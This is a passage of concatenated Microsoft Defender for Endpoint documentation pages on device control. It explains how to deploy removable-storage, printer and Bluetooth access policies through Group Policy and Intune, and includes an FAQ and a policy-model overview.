-1. Create one XML file for each removable storage group.
-
-2. Use the properties in your removable storage group to create an XML file for each removable storage group.
-
-3. Save each XML file to your network share.
-
-4. Define the settings as follows:
-
- 1. On a device running Windows, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Device Control** \> **Define device control policy groups**.
-
- 2. In the **Define device control policy groups** window, specify the network share file path containing the XML groups data.
-
-You can create different group types. Here's one group example XML file for any removable storage and CD-ROM, Windows portable devices, and approved USBs group: [XML file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/windows/device/Group%20Policy/Scenario%202%20GPO%20Removable%20Storage%20Group.xml)
-
-> [!NOTE]
-> Comments using XML comment notation `<!--COMMENT-->` can be used in the Rule and Group XML files, but they must be inside the first XML tag, not the first line of the XML file.
-
-## Define Policies
---
-1. Create one XML file for access policy rule.
-
-2. Use the properties in removable storage access policy rule(s) to create an XML for each group's removable storage access policy rule.
-
-3. Save the XML file to network share.
-
-4. Define the settings as follows:
-
- 1. On a device running Windows, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Device Control** \> **Define device control policy rules**.
-
- 2. In the **Define device control policy rules** window, select **Enabled**, and then specify the network share file path containing the XML rules data.
-
-> [!NOTE]
-> Comments using XML comment notation `<!-- COMMENT -->` can be used in the Rule and Group XML files, but they must be inside the first XML tag, not the first line of the XML file.
-
-## Set location for a copy of the file (evidence)
--
-If you want to have a copy of the file (evidence) having Write access, set right **Options** in your removable storage access policy rule in the XML file, and then specify the location where system can save the copy.
-
-1. On a device running Windows, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Device Control** \> **Define Device Control evidence data remote location**.
-
-2. In the **Define Device Control evidence data remote location** window, select **Enabled**, and then specify the local or network share folder path.
-
-## Retention period for local evidence cache
--
-If you want to change the default value of 60 days for persisting the local cache for file evidence, follow these steps:
-
-1. Go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Device Control** \> **Set the retention period for files in the local device control cache**.
-
-2. In the **Set the retention period for files in the local device control cache** window, select **Enabled**, and then enter the number of days to retain the local cache (default 60).
-
-## See also
--- [Device control in Defender for Endpoint](device-control-overview.md)-- [Device control policies in and settings](device-control-policies.md)-- [Device Control for macOS](mac-device-control-overview.md)
security Device Control Deploy Manage Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-deploy-manage-intune.md
- Title: Deploy and manage device control in Microsoft Defender for Endpoint with Microsoft Intune
-description: Learn how to deploy and manage device control in Defender for Endpoint using Microsoft Intune
--- Previously updated : 02/23/2024------ m365-security-- tier2-- mde-asr--- partner-contribution---
-# Deploy and manage device control in Microsoft Defender for Endpoint with Microsoft Intune
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-If you're using Intune to manage Defender for Endpoint settings, you can use it to deploy and manage device control capabilities. Different aspects of device control are managed differently in Intune, as described in the following sections.
-
-## Configure and manage device control in Intune
-
-1. Go to the [Intune admin center](https://intune.microsoft.com) and sign in.
-
-2. Go to **Endpoint security** > **Attack surface reduction**.
-
-3. Under **Attack surface reduction policies**, either select an existing policy, or select **+ Create Policy** to set up a new policy, using these settings:
-
- - In the **Platform** list, select **Windows 10, Windows 11, and Windows Server**. (Device control is not currently supported on Windows Server, even though you select this profile for device control policies.)
- - In the **Profile** list, select **Device Control**.
-
-4. On the **Basics** tab, specify a name and description for your policy.
-
-5. On the **Configuration settings** tab, you see a list of settings. You don't have to configure all of these settings at once. Consider starting with **Device Control**.
-
- :::image type="content" source="media/device-control-policy-intune.png" alt-text="Screenshot of Intune user interface for device control policies." lightbox="media/device-control-policy-intune.png":::
-
- - Under **Administrative Templates**, you have [Device Installation](/windows/client-management/mdm/policy-csp-deviceinstallation?WT.mc_id=Portal-fx) and [Removable Storage Access](/windows/client-management/mdm/policy-csp-admx-removablestorage) settings.
- - Under **Defender**, see [Allow Full Scan Removable Drive Scanning](/windows/client-management/mdm/policy-csp-defender#allowfullscanremovabledrivescanning) settings.
- - Under **Data Protection**, see [Allow Direct Memory Access](/windows/client-management/mdm/policy-csp-dataprotection) settings.
- - Under **Dma Guard**, see [Device Enumeration Policy](/windows/client-management/mdm/policy-csp-dmaguard?WT.mc_id=Portal-fx) settings.
- - Under **Storage**, see [Removable Disk Deny Write Access](/windows/client-management/mdm/policy-csp-Storage#removablediskdenywriteaccess) settings.
- - Under **Connectivity**, see [Allow USB Connection](/windows/client-management/mdm/policy-csp-Connectivity#allowusbconnection)** and [Allow Bluetooth](/windows/client-management/mdm/policy-csp-Connectivity#allowbluetooth) settings.
- - Under **Bluetooth**, see a list of settings that pertain to Bluetooth connections and services. For more details, see [Policy CSP - Bluetooth](/windows/client-management/mdm/policy-csp-Bluetooth?WT.mc_id=Portal-fx).
- - Under **Device Control**, you can configure custom policies with reusable settings. For more details, see [Device control overview: Rules](device-control-policies.md#rules).
-
-6. After you have configured your settings, proceed to the **Scope tags** tab, where you can specify [scope tags](/mem/intune/fundamentals/scope-tags) for the policy.
-
-7. On the **Assignments** tab, specify groups of users or devices to receive your policy. For more details, see [Assign policies in Intune](/mem/intune/configuration/device-profile-assign).
-
-8. On the **Review + create** tab, review your settings, and make any needed changes.
-
-9. When you're ready, select **Create** to create your device control policy.
-
-## Device control profiles
-
-In Intune, each row represents a device control policy. The included ID is the reusable setting that the policy applies to. The excluded ID is the reusable setting that's excluded from the policy. The entry for the policy contains the permissions allowed and the behavior for device control that comes into force when the policy applies.
--
-For information on how to add the reusable groups of settings that are included in the row of each device control policy, see the *Add reusable groups to a Device Control profile* section in [Use reusable groups of settings with Intune policies](/mem/intune/protect/reusable-settings-groups).
-
-Policies can be added and removed using the **+** and **ΓÇô** icons. The name of the policy appears in the warning to users, and in advanced hunting and reports.
-
-You can add audit policies, and you can add Allow/Deny policies. It is recommended to always add an Allow and/or Deny policy when adding an audit policy so that you don't experience unexpected results.
-
-> [!IMPORTANT]
-> If you only configure audit policies, the permissions are inherited from the default enforcement setting.
-
-> [!NOTE]
-> - The order in the which policies are listed in the user interface isn't preserved for policy enforcement. The best practice is to use **Allow/Deny policies**. Ensure that the **Allow/Deny policies** option is non-intersecting by explicitly adding devices to be excluded. Using Intune's graphical interface, you cannot change the default enforcement. If you change the default enforcement to Deny, any allow policy results in blocking actions.
-
-## Defining Settings with OMA-URI
-
-In the following table, identify the setting you want to configure, and then use the information in the OMA-URI and data type & values columns. Settings are listed in alphabetical order.
-
-| Setting | OMA-URI, data type, & values |
-|||
-| **Device control default enforcement** <br/>Default enforcement establishes what decisions are made during device control access checks when none of the policy rules match | `./Vendor/MSFT/Defender/Configuration/DefaultEnforcement`<br/><br/>Integer: <br/>- `DefaultEnforcementAllow` = `1`<br/>- `DefaultEnforcementDeny` = `2` |
-| **Device types** <br/>Device types, identified by their Primary IDs, with device control protection turned on | `./Vendor/MSFT/Defender/Configuration/SecuredDevicesConfiguration`<br/><br/>String:<br/>- `RemovableMediaDevices`<br/>- `CdRomDevices`<br/>- `WpdDevices`<br/>- `PrinterDevices` |
-| **Enable device control** <br/>Enable or disable device control on the device | `./Vendor/MSFT/Defender/Configuration/DeviceControlEnabled`<br/><br/>Integer:<br/>- Disable = `0`<br/>- Enable = `1` |
-| **Evidence data remote location** <br/>Device control moves evidence data captured | `./Vendor/MSFT/Defender/Configuration/DataDuplicationRemoteLocation`<br/><br/>String |
-| **Local evidence cache duration** <br/>Sets the retention period in days for files in the local device control cache | `./Vendor/MSFT/Defender/Configuration/DataDuplicationLocalRetentionPeriod`<br/><br/>Integer <br/>Example: `60` (60 days) |
-
-### Creating policies with OMA-URI
--
-When you create policies with OMA-URI in Intune, create one XML file for each policy. As a best practice, use the Device Control Profile or Device Control Rules Profile to author custom policies.
-
-In the **Add Row** pane, specify the following settings:
--- In the **Name** field, type `Allow Read Activity`.-- In the **OMA-URI** field, type `/Vendor/MSFT/Defender/Configuration/DeviceControl/PolicyRules/%7b[PolicyRule Id]%7d/RuleData`.-- In the **Data Type** field, select **String (XML file)**, and use **Custom XML**.-
-You can use parameters to set conditions for specific entries. Here's a [group example XML file for Allow Read access for each removable storage](https://github.com/microsoft/mdatp-devicecontrol/blob/main/windows/device/Intune%20OMA-URI/Allow%20Read.xml).
-
-> [!NOTE]
-> Comments using XML comment notation <!-- COMMENT --> can be used in the Rule and Group XML files, but they must be inside the first XML tag, not the first line of the XML file.
-
-### Creating groups with OMA-URI
--
-When you create groups with OMA-URI in Intune, create one XML file for each group. As a best practice, use reusable settings to define groups.
-
-In the **Add Row** pane, specify the following settings:
--- In the **Name** field, type `Any Removable Storage Group`.-- In the **OMA-URI** field, type `./Vendor/MSFT/Defender/Configuration/DeviceControl/PolicyGroups/%7b**[GroupId]**%7d/GroupData`. (To get your GroupID, in the Intune admin center, go to **Groups**, and then select **Copy the Object ID**.)-- In the **Data Type** field, select **String (XML file)**, and use **Custom XML**.-
-> [!NOTE]
-> Comments using XML comment notation `<!-- COMMENT -- >` can be used in the Rule and Group XML files, but they must be inside the first XML tag, not the first line of the XML file.
-
-## Configure removable storage access control using OMA-URI
-
-1. Go to the [Microsoft Intune admin center](https://intune.microsoft.com) and sign in.
-
-2. Choose **Devices** > **Configuration profiles**. The **Configuration profiles** page appears.
-
-3. Under the **Policies** tab (selected by default), select **+ Create**, and choose **+ New policy** from the drop-down that appears. The **Create a profile** page appears.
-
-4. In the **Platform** list, select **Windows 10, Windows 11, and Windows Server** from the **Platform** drop-down list, and choose **Templates** from the **Profile type** drop-down list.
-
- Once you choose **Templates** from the **Profile type** drop-down list, the **Template name** pane is displayed, along with a search box (to search the profile name).
-
-5. Select **Custom** from the **Template name** pane, and select **Create**.
-
-6. Create a row for each setting, group, or policy by implementing Steps 1-5.
-
-## View device control groups (Reusable settings)
-
-In Intune, device control groups appear as reusable settings.
-
-1. Go to the [Microsoft Intune admin center](https://endpoint.microsoft.com) and sign in.
-
-2. Go to **Endpoint Security** > **Attack Surface Reduction**.
-
-3. Select the **Reusable Settings** tab.
-
-## See also
--- [Device control in Defender for Endpoint](device-control-overview.md)-- [Device control policies and settings](device-control-policies.md)-- [Device Control for macOS](mac-device-control-overview.md)
security Device Control Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-faq.md
- Title: Microsoft Defender for Endpoint Device Control frequently asked questions
-description: Answers frequently asked questions about device control in Defender for Endpoint
-------- m365-security-- tier3-- mde-asr-- Previously updated : 01/25/2024---
-# Microsoft Defender for Endpoint Device Control frequently asked questions
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)--
-This article provides answers to frequently asked questions about device control removable storage capabilities in Microsoft Defender for Endpoint.
-
-## How do I generate GUID for Group ID/PolicyRule ID/Entry ID?
-
-You can generate the GUID through online open source or by using PowerShell. For more information, see [How to generate GUID through PowerShell](/powershell/module/microsoft.powershell.utility/new-guid).
-
-![Screenshot of GUID in PowerShell.](https://user-images.githubusercontent.com/81826151/159046476-26ea0a21-8087-4f01-b8ae-5aa73b392d8f.png)
-
-## What are the removable storage media and policy limitations?
-
-The backend call is done through OMA-URI (GET to read or PATCH to update) either from Intune or through Microsoft Graph API. The limitation is the same as any OMA-URI custom configuration profile at Microsoft, which is officially 350,000 characters for XML files. For example, if you need two blocks of entries per user SID to "Allow" / "Audit allowed" specific users, and then two blocks of entries at the end to "Deny" all, you'll be able to manage 2,276 users.
-
-## Why doesn't the policy work?
-
-The most common reason is there's no required anti-malware client version.
-
-Another reason could be that the XML file isn't correctly formatted. For example, not using the correct markdown formatting for the "&" character in the XML file or the text editor might add a byte order mark (BOM) 0xEF 0xBB 0xBF at the beginning of the files causing the XML parsing not to work. One simple solution is to download the [sample file](https://github.com/microsoft/mdatp-devicecontrol/tree/main/Removable%20Storage%20Access%20Control%20Samples) (select **Raw** and then **Save as**), and then update.
-
-If you're deploying and managing the policy by using Group Policy, make sure to combine all policy rules into one XML file within a parent node called `PolicyRules`. Also, combine all groups into one XML file within a parent node called `Groups`. If you're managing devices with Intune, keep separate XML files for each group and policy when deploying as `Custom OMA-URI`.
-
-The device (machine) should have a valid certificate. Run the following command on the machine to check:
-
-`Get-AuthenticodeSignature C:\Windows\System32\wbem\WmiPrvSE.exe`
-
-![Screenshot showing results of Get-AuthenticodeSignature cmdlet.](https://user-images.githubusercontent.com/81826151/202582101-5470dd54-ef32-4448-80c9-ba23a721dc70.png)
-
-If the policy still isn't working, contact support, and share your support cab. To get that file, open Command Prompt as an administrator, and then use the following command:
-
-`"%programfiles%\Windows Defender\MpCmdRun.exe" -GetFiles`
-
-## Why is there no configuration UX for some policy groups?
-
-There is no configuration UX for **Define device control policy groups** and **Define device control policy rules** on your Group Policy. But, you can still get the related `.adml` and `.admx` files by selecting **Raw** and **Save as** at the [WindowsDefender.adml](https://github.com/microsoft/mdatp-devicecontrol/blob/main/WindowsDefender.adml) and [WindowsDefender.admx](https://github.com/microsoft/mdatp-devicecontrol/blob/main/WindowsDefender.admx) files.
-
-## How do I confirm that the latest policy has been deployed to the target machine?
-
-You can run the PowerShell cmdlet `Get-MpComputerStatus` as an administrator. The following value will show whether the latest policy has been applied to the target machine.
--
-## How can I know which machine is using out of date anti-malware client version in the organization?
-
-You can use following query to get anti-malware client version on the Microsoft 365 security portal:
-
-```kusto
-//check the anti-malware client version
-DeviceFileEvents
-|where FileName == "MsMpEng.exe"
-|where FolderPath contains @"C:\ProgramData\Microsoft\Windows Defender\Platform\"
-|extend PlatformVersion=tostring(split(FolderPath, "\\", 5))
-//|project DeviceName, PlatformVersion // check which machine is using legacy platformVersion
-|summarize dcount(DeviceName) by PlatformVersion // check how many machines are using which platformVersion
-|order by PlatformVersion desc
-```
-
-## How do I find the media property in the Device Manager?
-
-1. Plug in the media.
-
-2. Open Device Manager.
-
- ![Screenshot of Device Manager.](https://user-images.githubusercontent.com/81826151/181859412-affd6aa1-09ad-44bf-9541-330499cc2c87.png)
-
-3. Locate the media in the Device Manager, right-click, and then select **Properties**.
-
- :::image type="content" alt-text="Screenshot of media in the Device Manager." source="https://user-images.githubusercontent.com/81826151/181859700-62a6f704-b12e-41e3-a048-7d63432654a4.png":::
-
-4. Open **Details**, and then select **Properties**.
-
- :::image type="content" alt-text="Screenshot of right-click menu for disk drives in Device Manager." source="https://user-images.githubusercontent.com/81826151/181859852-00bc8b11-8ee5-4d46-9770-fa29f894d13f.png":::
-
-Another way is to deploy an Audit policy to the organization, and see the events in advanced hunting or the device control report.
-
-<a name='how-do-i-find-sid-for-azure-ad-group'></a>
-
-## How do I find Sid for Microsoft Entra group?
-
-Different from Microsoft Entra groups, the Sid is using Object Id for Microsoft Entra group. You can find the Object Id from Azure portal.
-
-![image](https://user-images.githubusercontent.com/81826151/200895994-cc395452-472f-472e-8d56-351165d341a7.png)
-
-## Why is my printer blocked in my organization?
-
-The **Default Enforcement** setting is for all device control components, which means if you set it to `Deny`, it will block all printers as well. You can either create custom policy to explicitly allow printers or you can replace the Default Enforcement policy with a custom policy.
-
-## Why is creating a folder not blocked by File system level access?
-Creating an empty folder will not be blocked even if **File system level access** Write access Deny is configured. Any non-empty file will be blocked.
-
-## Why is my USB still blocked with an allow-ready policy?
-Some specific USB devices require more than Read access, the following list shows some examples:
-1. To Read access some Kingston encrypted USBs requires Execute access for its CDROM.
-2. To Read access some WD My Passport USBs requires Disk level Write access. For this case, if you want to deny Write access, you should use the **File system level access**
-
-The best way to understand this is to check the event on the Advanced hunting which will clearly show what accessMask is required.
-
-## Can I use both Group Policy and Intune deploy policies?
-
-You can use Group Policy and Intune to manage device control, but for one machine, use *either* Group Policy *or* Intune. If a machine is covered by both, device control will only apply the Group Policy setting.
-
-## Is device control available in Microsoft Defender for Business?
-
-Yes, for Windows and Mac.
-
-To set up device control on Windows, use [attack surface reduction rules in Defender for Business](/microsoft-365/security/defender-business/mdb-asr). You'll need [Microsoft Intune](/mem/intune/fundamentals/what-is-intune). The standalone version of Defender for Business does not include Intune, but it can be added on. [Microsoft 365 Business Premium](/microsoft-365/business-premium) does include Intune. See [Microsoft Defender for Endpoint Device Control Removable Storage Access Control](device-control-removable-storage-access-control.md).
-
-To set up device control on Mac, use Intune or Jamf. See [Device Control for macOS](mac-device-control-overview.md).
security Device Control Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-overview.md
- Title: Device control in Microsoft Defender for Endpoint
-description: Get an overview of device control, including removable storage access control and device installation policies in Defender for Endpoint
--- Previously updated : 02/14/2024------ m365-security-- tier2-- mde-asr--- partner-contribution---
-# Device control in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-Device control capabilities in Microsoft Defender for Endpoint enable your security team to control whether users can install and use peripheral devices, like removable storage (USB thumb drives, CDs, disks, etc.), printers, Bluetooth devices, or other devices with their computers. Your security team can configure device control policies to configure rules like these:
--- Prevent users from installing and using certain devices (like USB drives)-- Prevent users from installing and using *any* external devices with specific exceptions-- Allow users to install and use specific devices-- Allow users to install and use only [BitLocker](/windows/security/operating-system-security/data-protection/bitlocker/)-encrypted devices with Windows computers-
-This list is intended to provide some examples. It's not an exhaustive list; there are other examples to consider (see the [device control in Windows](#device-control-in-windows) section in this article).
-
-Device control helps protect your organization from potential data loss, malware, or other cyberthreats by allowing or preventing certain devices to be connected to users' computers. With device control, your security team can determine whether and what peripheral devices users can install and use on their computers.
-
-## Device control in Windows
-
-This section lists scenarios for device control in Windows.
-
-> [!TIP]
-> If you're using Mac, device control can control access to Bluetooth, iOS devices, portable devices such as cameras, and removable media such as USB devices. See [Device Control for macOS](mac-device-control-overview.md).
-
-Select a tab, review the scenarios, and then identify the type of device control policy to create.
-
-## [**Removable storage**](#tab/Removable)
-
-| Scenario | Device control policy |
-|||
-| Prevent installation of a specific USB device | Device control in Windows. See [Device control policies](device-control-policies.md). |
-| Prevent installation of all USB devices while allowing an installation of only an authorized USB | Device control in Windows. See [Device control policies](device-control-policies.md). |
-| Prevent Write and Execute access to all but allow specific approved USBs | Device control in Defender for Endpoint. See [Device control policies](device-control-policies.md). |
-| Audit Write and Execute access for all but block specific blocked USBs | Device control in Defender for Endpoint. See [Device control policies](device-control-policies.md). |
-| Block read and execute access to specific file extension | Device control in Microsoft Defender. See [Device control policies](device-control-policies.md). |
-| Block people from access removable storage when the machine isn't connecting corporate network | Device control in Microsoft Defender. See [Device control policies](device-control-policies.md). |
-| Block write access to removable data drives not protected by BitLocker | Device control in Windows. See [BitLocker](/windows/security/operating-system-security/data-protection/bitlocker/configure?tabs=common). |
-| Block write access to devices configured in another organization | Device control in Windows. See [BitLocker](/windows/security/operating-system-security/data-protection/bitlocker/configure?tabs=common). |
-| Prevent copying of sensitive files to USB | [Endpoint DLP](/purview/endpoint-dlp-learn-about) |
---
-## [**Printers**](#tab/Printers)
-
-| Scenario | Device control policy |
-|||
-| Block people from printing via noncorporate printers | Device control in Defender for Endpoint. See [Device control policies](device-control-policies.md). |
-| Only allow specific USB printer(s) by VID/PID | Device control in Defender for Endpoint. See [Device control policies](device-control-policies.md). |
-| Prevent installation of all printers | Device control in Windows. See [Device control policies](device-control-policies.md). |
-| Prevent installation of a specific printer | Device control in Windows. See [Device control policies](device-control-policies.md). |
-| Prevent installation of all printers while allowing a specific printer to be installed | Device control in Windows. See [Device control policies](device-control-policies.md). |
-| Block printing of sensitive documents to any printer | [Endpoint DLP](/purview/endpoint-dlp-learn-about) |
--
-## [**Bluetooth**](#tab/Bluetooth)
-
-| Scenario | Device control policy |
-|||
-| Block copying of sensitive document to any Bluetooth Device | [Endpoint DLP](/purview/endpoint-dlp-learn-about) |
---
-## Supported devices
-
-Device control supports Bluetooth devices, CD/ROMs and DVD devices, printers, USB devices, and other types of portable devices. On a Windows device, based on the driver, some peripheral devices are marked as removable. The following table lists examples of devices that device control supports with their `primary_id` values and media class names:
-
-| Device type | `PrimaryId` in Windows | `primary_id` in macOS | Media Class Name |
-|||||
-| Bluetooth devices | | `bluetoothDevice` | `Bluetooth Devices` |
-| CD/ROMs, DVDs | `CdRomDevices` | | `CD-Roms` |
-| iOS devices | | `appleDevice` | |
-| Portable devices (such as cameras) | | `portableDevice` | |
-| Printers | `PrinterDevices` | | `Printers` |
-| USB devices (removable media) | `RemovableMediaDevices` | `removableMedia` | `USB` |
-| Windows Portable Devices | `WpdDevices` | | `Windows Portable Devices (WPD)` |
-
-## Categories of Microsoft device control capabilities
-
-Device control capabilities from Microsoft can be organized into three main categories: device control in Windows, device control in Defender for Endpoint, and Endpoint Data Loss Prevention (Endpoint DLP).
--- **Device control in Windows**. The Windows operating system has built-in device control capabilities. Your security team can configure device installation settings to prevent (or allow) users from installing certain devices on their computers. Policies are applied at the device level, and use various device properties to determine whether or not a user can install/use a device. Device control in Windows works with BitLocker and ADMX templates, and can be managed using Intune.-
- - **BitLocker and Intune**. [BitLocker](/windows/security/operating-system-security/data-protection/encrypted-hard-drive) is a Windows security feature that provides encryption for entire volumes. Together with [Intune](/mem/intune/fundamentals/what-is-intune), policies can be configured to enforce encryption on devices using BitLocker for Windows (and FileVault for Mac). For more information, see [Disk encryption policy settings for endpoint security in Intune](/mem/intune/protect/endpoint-security-disk-encryption-profile-settings).
-
- - **Administrative Templates (ADMX) and Intune**. You can use ADMX templates to create policies that restrict or allow specific types of USB devices to be used with computers. For more information, see [Restrict USB devices and allow specific USB devices using ADMX templates in Intune](/mem/intune/configuration/administrative-templates-restrict-usb).
--- **Device control in Defender for Endpoint**. Device control in Defender for Endpoint provides more advanced capabilities and is cross platform. You can configure device control settings to prevent (or allow) users to have Read, Write, or Execute access to content on removable storage devices. You can define exceptions, and you can choose to employ audit policies that detect but don't block users from accessing their removable storage devices. Policies are applied at the device level, user level, or both. Device control in Microsoft Defender can be managed using Intune.-
- - **Device control in Microsoft Defender and Intune**. Intune provides a rich experience for managing complex device control policies for organizations. You can configure and deploy device restriction settings in Defender for Endpoint, for example. See [Configure device restriction settings in Microsoft Intune](/mem/intune/configuration/device-restrictions-configure).
--- **Endpoint data loss prevention** (Endpoint DLP). Endpoint DLP monitors sensitive information on devices that are onboarded to Microsoft Purview solutions. DLP policies can enforce protective actions on sensitive information and where it's stored or used. [Learn about Endpoint DLP](/purview/endpoint-dlp-learn-about).-
-See the [device control scenarios](#device-control-in-windows) section (in this article) for more details about these capabilities.
--
-## Device control samples and scenarios
-
-Device control in Defender for Endpoint provides your security team with a robust access control model that enables a wide range of scenarios (see [Device control policies](device-control-policies.md)). We have put together a GitHub repository that contains samples and scenarios you can explore. See the following resources:
--- [Device control samples README](https://github.com/microsoft/mdatp-devicecontrol/blob/main/README.md)-- [Getting started with device control samples on Windows devices](https://github.com/microsoft/mdatp-devicecontrol/blob/main/windows/Getting%20Started/readme.md)-- [Device control for macOS samples](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/README.md)-
-If you're new to device control, see [Device control walkthroughs](device-control-walkthroughs.md).
-
-## Prerequisites
-
-Device control in Defender for Endpoint can be applied to devices running Windows 10 or Windows 11 that have the anti-malware client version `4.18.2103.3` or later. (Currently, servers are not supported.)
--- `4.18.2104` or later: Add `SerialNumberId`, `VID_PID`, filepath-based GPO support, and `ComputerSid`-- `4.18.2105` or later: Add Wildcard support for `HardwareId/DeviceId/InstancePathId/FriendlyNameId/SerialNumberId`, the combination of specific user on specific machine, removable SSD (a SanDisk Extreme SSD)/USB Attached SCSI (UAS) support-- `4.18.2107` or later: Add Windows Portable Device (WPD) support (for mobile devices, such as tablets); add `AccountName` into advanced hunting-- `4.18.2205` or later: Expand the default enforcement to Printer. If you set it to Deny, it blocks Printer as well, so if you only want to manage storage, make sure to create a custom policy to allow Printer-- `4.18.2207` or later: Add File support; the common use case can be: block people from Read/Write/Execute access specific file on removable storage. Add Network and VPN Connection support; the common use case can be: block people from access removable storage when the machine isn't connecting corporate network.-
-For Mac, see [Device Control for macOS](mac-device-control-overview.md).
-
-Currently, device control is not supported on servers.
-
-## Next steps
--- [Device control walkthroughs](device-control-walkthroughs.md)-- [Learn about Device control policies](device-control-policies.md)-- [View device control reports](device-control-report.md)
security Device Control Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-policies.md
- Title: Device control policies in Microsoft Defender for Endpoint
-description: Learn about Device control policies in Defender for Endpoint
--- Previously updated : 04/09/2024------ m365-security-- tier2-- mde-asr--- partner-contribution---
-# Device control policies in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-This article describes device control policies, rules, entries, groups, and advanced conditions. Essentially, device control policies define access for a set of devices. The devices that are in scope are determined by a list of included device groups and a list of excluded device groups. A policy applies if the device is in all of the included device groups and none of the excluded device groups. If no policies apply, then the default enforcement is applied.
-
-By default device control is disabled, so access to all types of devices is allowed. To learn more about device control, see [Device control in Microsoft Defender for Endpoint](device-control-overview.md).
-
-## Controlling default behavior
-
-When device control is enabled, it's enabled for all device types by default. The default enforcement can also be changed from *Allow* to *Deny*. Your security team can also configure the types of devices that device control protects. The following table below illustrates how various combinations of settings change the access control decision.
-
-| Is device control enabled? | Default behavior | Device types |
-||||
-| No | Access is allowed | - CD/DVD drives <br/>- Printers <br/>- Removable media devices <br/>- Windows portable devices |
-| Yes | (Not specified) <br/>Access is allowed | - CD/DVD drives <br/>- Printers <br/>- Removable media devices <br/>- Windows portable devices |
-| Yes | Deny | - CD/DVD drives <br/>- Printers <br/>- Removable media devices <br/>- Windows portable devices |
-| Yes | Deny removable media devices and printers | - Printers and removable media devices (blocked) <br/>- CD/DVD drives and Windows portable devices (allowed) |
-
-When device types are configured, device control in Defender for Endpoint ignores requests to other device families.
-
-For more information, see the following articles:
--- [Deploy and manage device control with Intune](device-control-deploy-manage-intune.md)-- [Deploy and manage device control with Group Policy](device-control-deploy-manage-gpo.md)-
-## Policies
-
-To further refine access to devices, device control uses policies. A policy is a set of rules and groups. How rules and groups are defined varies slightly among management experiences and operating systems, as described in the following table.
-
-| Management tool | Operating system | How rules and groups are managed |
-||||
-| Intune ΓÇô Device control policy | Windows | Device and printer groups can be managed as reusable settings and included in rules. Not all features are available in the device control policy (see [Deploy and manage device control with Microsoft Intune](device-control-deploy-manage-intune.md)) |
-| Intune ΓÇô Custom | Windows | Each group/rule is stored as an XML string in custom configuration policy. The OMA-URI contains the GUID of the group/rule. The GUID must be generated. |
-| Group Policy | Windows | The groups and rules are defined in separate XML settings in the Group Policy Object (see [Deploy and manage device control with Group Policy](device-control-deploy-manage-gpo.md)). |
-| Intune | Mac | The rules and policies are combined into a single JSON and included in the `mobileconfig` file that is deployed by using Intune |
-| JAMF | Mac | The rules and policies are combined into a single JSON and configured by using JAMF as the device control policy (see [Device Control for macOS](mac-device-control-overview.md)) |
-
-Rules and groups are identified by Global Unique ID (GUIDs). If device control policies are deployed using a management tool other than Intune, the GUIDs must be generated. You can generate the GUIDs by using [PowerShell](/powershell/module/microsoft.powershell.utility/new-guid).
-
-For schema details, see [JSON schema for Mac](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/device_control_policy_schema.json).
-
-## Users
-
-Device control policies can be applied to users and/or user groups.
-
-> [!NOTE]
-> In the articles related to device control, groups of users are referred to as <i>user groups</i>. The term <i>groups</i> refer to [groups](#groups) defined in the device control policy.
-
- Using Intune, on either Mac and Windows, device control policies can be targeted to user groups defined in Entra Id.
-
-On Windows, a user or user group can be a condition on an [entry](#entries) in a policy.
-
-Entries with user or user groups can reference objects from either Entra Id or a local Active Directory.
-
-### Best practices for using device control with users and user groups
--- To create a rule for an individual user on Windows, create an entry with a `Sid` condition foreach user in a [rule](#rules)--- To create a rule for a user group on Windows and Intune, **either** create an entry with a `Sid` condition for each user group in a [rule] and target the policy to a machine group in Intune **or** create a rule without conditions and target the policy with Intune to the user group.--- On Mac, use Intune and target the policy to a user group in Entra Id.-
-> [!WARNING]
-> Do not use both user/user group conditions in rules and user group targeting in Intune.
-
-> [!NOTE]
-> If network connectivity is an issue, use Intune user group targeting **or** a local Active Directory groups. User/user group conditions that reference Entra Id should **only** be used in environments that have a reliable connection to Entra Id.
-
-## Rules
-
-A rule defines the list of included groups and a list of excluded groups. For the rule to apply, the device must be in all of the included groups and none of the excluded groups. If the device matches the rule, then the entries for that rule are evaluated. An entry defines the action and notification options applied, if the request matches the conditions. If no rules apply or no entries match the request then the default enforcement is applied.
-
-For example, to allow write access for some USB devices, and read access for all other USB devices, use the following policies, groups, and entries with default enforcement set to deny.
-
-| Group | Description |
-|||
-| All Removable Storage Devices | Removable Storage Devices |
-| Writeable USBs | List of USBs where write access is permitted |
-
-|Rule | Included Device Groups | Excluded Device Groups | Entry |
-|||||
